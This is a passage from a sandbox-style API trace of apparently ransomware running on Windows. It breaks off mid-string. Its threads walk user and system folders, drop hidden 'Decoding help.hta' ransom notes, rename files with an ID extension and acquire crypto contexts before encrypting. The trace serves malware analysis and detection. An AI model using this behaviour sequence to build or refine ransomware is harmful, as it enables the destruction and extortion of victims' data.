ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.720] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.720] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.720] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x80be8ad0, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0059.720] lstrcmpW (lpString1=".", lpString2="Resource") returned -1 [0059.720] lstrcmpW (lpString1="..", lpString2="Resource") returned -1 [0059.721] lstrcmpiW (lpString1="windows", lpString2="Resource") returned 1 [0059.721] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*" [0059.721] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*.*") returned 71 [0059.721] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\", lpString2="Resource" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" [0059.721] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*.*" [0059.721] GlobalMemoryStatus (in: lpBuffer=0xcc8fd10 | out: lpBuffer=0xcc8fd10) [0059.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7d84f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdf0 [0059.725] CloseHandle (hObject=0xdf0) returned 1 [0059.725] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0xcc8fd30 | out: lpFindFileData=0xcc8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x80be8ad0, ftLastWriteTime.dwHighDateTime=0x1d33740, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 0 [0059.725] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 924 os_tid = 0x970 [0059.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*", lpFindFileData=0xcf0fd30 | out: lpFindFileData=0xcf0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x2c8a1330, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2c8a1330, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6710b0 [0061.265] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.265] FindNextFileW (in: hFindFile=0x6710b0, lpFindFileData=0xcf0fd30 | out: lpFindFileData=0xcf0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x2c8a1330, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2c8a1330, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.265] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.265] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.266] FindNextFileW (in: hFindFile=0x6710b0, lpFindFileData=0xcf0fd30 | out: lpFindFileData=0xcf0fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c8a1330, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x2c8a1330, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2c8a1330, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0061.266] lstrcpyW (in: lpString1=0x2a6c80c0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*" [0061.266] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*.*") returned 71 [0061.266] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Decoding help.hta" [0061.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\decoding help.hta")) returned 0x1 Thread: id = 925 os_tid = 0x974 [0059.729] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*.*", lpFindFileData=0x1074fd30 | out: lpFindFileData=0x1074fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0059.729] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.729] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1074fd30 | out: lpFindFileData=0x1074fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.729] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.729] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.729] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x1074fd30 | out: lpFindFileData=0x1074fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0059.729] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 926 os_tid = 0xd58 [0059.741] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x1225fd30 | out: lpFindFileData=0x1225fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b10 [0059.745] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.745] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1225fd30 | out: lpFindFileData=0x1225fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.745] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.745] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.746] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1225fd30 | out: lpFindFileData=0x1225fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9b6a040, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9b6a040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xde963ca0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="rdrmessage.zip", cAlternateFileName="RDRMES~1.ZIP")) returned 1 [0059.746] lstrcpyW (in: lpString1=0x985a718, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*" [0059.746] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*") returned 73 [0059.746] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Decoding help.hta" [0059.746] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\decoding help.hta")) returned 0xffffffff [0059.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaac [0061.269] WriteFile (in: hFile=0xaac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1225fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1225fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.270] CloseHandle (hObject=0xaac) returned 1 [0061.270] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.271] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rdrmessage.zip") returned -1 [0061.271] lstrlenW (lpString="rdrmessage.zip") returned 14 [0061.271] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*" [0061.271] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*") returned 73 [0061.271] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\", lpString2="rdrmessage.zip" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" [0061.271] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" [0061.271] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.[ID]g9uZrLhJaygpwRm1[ID]" [0061.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0061.980] CreateFileMappingA (hFile=0x5a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x718 [0061.980] CryptAcquireContextA (phProv=0x1225fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 927 os_tid = 0x9a4 [0059.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*.*", lpFindFileData=0x125dfd30 | out: lpFindFileData=0x125dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3570 [0059.749] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.749] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x125dfd30 | out: lpFindFileData=0x125dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.749] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.749] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.749] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x125dfd30 | out: lpFindFileData=0x125dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0059.750] lstrcmpW (lpString1=".", lpString2="Adobe Custom Dictionary") returned -1 [0059.750] lstrcmpW (lpString1="..", lpString2="Adobe Custom Dictionary") returned -1 [0059.750] lstrcmpiW (lpString1="windows", lpString2="Adobe Custom Dictionary") returned 1 [0059.750] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*.*" [0059.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*.*") returned 85 [0059.750] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\", lpString2="Adobe Custom Dictionary" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary" [0059.750] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*.*" [0059.750] GlobalMemoryStatus (in: lpBuffer=0x125dfd10 | out: lpBuffer=0x125dfd10) [0059.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5de0938, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xdf4 [0059.755] CloseHandle (hObject=0xdf4) returned 1 [0059.756] FindNextFileW (in: hFindFile=0x5e3570, lpFindFileData=0x125dfd30 | out: lpFindFileData=0x125dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0059.756] FindClose (in: hFindFile=0x5e3570 | out: hFindFile=0x5e3570) returned 1 Thread: id = 928 os_tid = 0x7d8 [0059.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*", lpFindFileData=0x1199fd30 | out: lpFindFileData=0x1199fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8690 [0059.747] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.747] FindNextFileW (in: hFindFile=0x5d8690, lpFindFileData=0x1199fd30 | out: lpFindFileData=0x1199fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.748] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.748] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.748] FindNextFileW (in: hFindFile=0x5d8690, lpFindFileData=0x1199fd30 | out: lpFindFileData=0x1199fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="currency.css", cAlternateFileName="")) returned 1 [0059.748] lstrcpyW (in: lpString1=0x9862720, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*" [0059.748] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*") returned 80 [0059.748] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\Decoding help.hta" [0059.748] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0059.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaac [0061.272] WriteFile (in: hFile=0xaac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1199fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1199fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.272] CloseHandle (hObject=0xaac) returned 1 [0061.273] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.273] lstrcmpiW (lpString1="Decoding help.hta", lpString2="currency.css") returned 1 [0061.273] lstrlenW (lpString="currency.css") returned 12 [0061.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*" [0061.273] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\*.*") returned 80 [0061.273] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\css\\", lpString2="currency.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows 